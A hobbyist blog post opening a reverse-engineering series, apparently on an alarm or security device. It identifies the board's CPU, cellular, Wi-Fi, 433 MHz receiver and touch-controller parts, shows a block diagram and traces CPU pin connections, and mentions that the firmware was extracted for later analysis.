When inspecting the board, I found a few significant components and modules on the board. I was not surprised to see that most of the major communication parts are off the shelf modules. The components listed below are highlighted in the image above and the relevant data sheets where available are linked.

U2 – 433mhz Receiver: Synoxo SYN551R (datasheet)
M2 – Cellular module: Quictel M26
M3 – WIFI module: HF-LPB120 (not much good source material on this module)
U7 – Touch Controller: Holtek BS83B16A-3
U8 – Main CPU: Gigadevices GD32F105RCT6 (datasheet)

The main processor is a GigaDevice GD32 chip which is a series that is very similar to the of STMicroelectronics STM32 chips. The GD32F105 chip uses an ARM-based instruction set and has the same pinout as the STM32F105 component.

Block Diagram

The high-level block diagram for the device is pretty straight forward. The GD32F105 chip is the primary processing and control of the external communication modules. This allows for a modular architecture all of the peripherals.

 +-----------------------+
 |  Cellular             +-----------+
 |  Quictel M26          |           |
 +-----------------------+           |
 +-----------------------+  +--------+-------+
 |  WIFI                 +--+   CPU          |
 |  HF-LPB120-1          |  |   GD32F105RCT6 |
 +-----------------------+  +--------+-+-----+
 +-----------------------+           | |
 |  433mhz receiver      |           | |
 |  SYN511R              +-----------+ |
 +-----------------------+             |
 +-----------------------+             |
 |  Keypad Controller    +-------------+
 |  Holtek BS83B16A-3    |
 +-----------------------+

Pin Out

When exploring the board there are many test points on the board and tracing them out I was able to trace out most of the pins to where they connect on the controller.

SYN515R Pin 10 (DO) -> CPU PB9 (62)
Unknown -> CPU PA5
Unknown -> CPU PA6
Unknown -> CPU PA8
U7 SCL -> Unknown
U7 SDA -> Unknown
DAC_OUT -> CPU PA4 (20)
WIFI UART TX -> CPU PA2 (16)
WIFI UART RX -> CPU PA3 (17)
GSM UART TX -> CPU PA12 (45)
GSM UART RX -> CPU PA13 (46)
U1 (F117) Pin 6 -> CPU PB 8

Summary?

After investigating the hardware I was able to extract the firmware and start the reversing process. I will cover what I have found in future posts. For now, if you are interested in more higher resolution photos of the board I have posted them on my Flickr account.